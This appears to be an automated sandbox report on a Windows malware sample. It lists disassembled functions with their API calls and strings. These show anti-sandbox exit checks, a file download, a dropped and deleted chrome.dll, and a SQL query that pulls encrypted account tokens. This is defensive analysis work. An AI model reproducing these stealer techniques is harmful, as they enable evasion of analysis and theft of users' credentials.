Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

C, xrefs: 004176DC
:, xrefs: 004176EC
\, xrefs: 004176F0

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9

Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00973DF8,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00973DF8,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
__aulldiv.LIBCMT ref: 00418302
__aulldiv.LIBCMT ref: 00418310
wsprintfA.USER32 ref: 0041833C

Strings

%d MB, xrefs: 00418333
@, xrefs: 004182DD

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9

Function 004060F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
StrCmpCA.SHLWAPI(?,00976668), ref: 00406197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
InternetCloseHandle.WININET(00412DB1), ref: 004062A3
InternetCloseHandle.WININET(00000000), ref: 004062B0

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: 28317a5f4b32b5285a3637a607846846f53c0ba5e8d8391b34f33a6405c08cc5
Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
Opcode Fuzzy Hash: 28317a5f4b32b5285a3637a607846846f53c0ba5e8d8391b34f33a6405c08cc5
Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59

Function 00417350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
memset.MSVCRT ref: 004173EA
??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
Opcode Fuzzy Hash: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59

Function 0040BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrlenA.KERNEL32(00000000), ref: 0040BC6F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
lstrlenA.KERNEL32(00000000), ref: 0040BD75
lstrlenA.KERNEL32(00000000), ref: 0040BD89

Strings

AccountTokens, xrefs: 0040BA8A
AccountTokens, xrefs: 0040BB19
AccountId, xrefs: 0040BC94
SELECT service, encrypted_token FROM token_service, xrefs: 0040BBBB

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: 34a5fec9f442c2823ea9618ff25306948c13a5273e9f73e96b93716083a88691
Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
Opcode Fuzzy Hash: 34a5fec9f442c2823ea9618ff25306948c13a5273e9f73e96b93716083a88691
Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A

Function 004108A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871

Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098

StrCmpCA.SHLWAPI(00000000,0096C408), ref: 00410922
StrCmpCA.SHLWAPI(00000000,0096C3F8), ref: 00410B79
StrCmpCA.SHLWAPI(00000000,0096C418), ref: 00410A0C

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35

Strings

C:\ProgramData\chrome.dll, xrefs: 00410C30
C:\ProgramData\chrome.dll, xrefs: 004108CD

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CreateDeleteLibraryLoad
String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
API String ID: 585553867-663540502
Opcode ID: 3cba495796730e71670c0198b1c3556984460aa715bb36b7f53b4f9760dbd593
Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
Opcode Fuzzy Hash: 3cba495796730e71670c0198b1c3556984460aa715bb36b7f53b4f9760dbd593
Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A

Function 004149D0 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,00975FC0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00414A51
lstrcatA.KERNEL32(?,?), ref: 00414A70
lstrcatA.KERNEL32(?,?), ref: 00414A84
lstrcatA.KERNEL32(?,0096EAA0), ref: 00414A97
lstrcatA.KERNEL32(?,?), ref: 00414AAB
lstrcatA.KERNEL32(?,009744E0), ref: 00414ABF

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 287b75548e42ac9bba5700b012afc14cf6db2ae93f5d05c923625ed8275abeeb
Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
Opcode Fuzzy Hash: 287b75548e42ac9bba5700b012afc14cf6db2ae93f5d05c923625ed8275abeeb
Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99

Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CC00), ref: 00419BF1
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CAB0), ref: 00419C0A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096C918), ref: 00419C22
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CB70), ref: 00419C3A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CB28), ref: 00419C53
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00967280), ref: 00419C6B
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00966930), ref: 00419C83
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00966630), ref: 00419C9C
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096C948), ref: 00419CB4
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CBA0), ref: 00419CCC
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CAC8), ref: 00419CE5
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CAE0), ref: 00419CFD
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00966950), ref: 00419D15
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CB10), ref: 00419D2E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14

GetUserDefaultLCID.KERNEL32 ref: 00416CC6

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0096C238,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,0096C238,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: 9fced759540180fd7acdc198eac4cfb2cc9391b0ca0e7afce8ef1ee0daef0713
Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
Opcode Fuzzy Hash: 9fced759540180fd7acdc198eac4cfb2cc9391b0ca0e7afce8ef1ee0daef0713
Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E

Function 0041856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

RegQueryValueExA.KERNEL32(00000000,00974038,00000000,000F003F,?,00000400), ref: 0041867C
lstrlenA.KERNEL32(?), ref: 00418691
RegQueryValueExA.KERNEL32(00000000,00973E40,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
RegCloseKey.KERNEL32(00000000), ref: 00418798
RegCloseKey.ADVAPI32(00000000), ref: 004187AA

Strings

%s\%s, xrefs: 004185DD

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
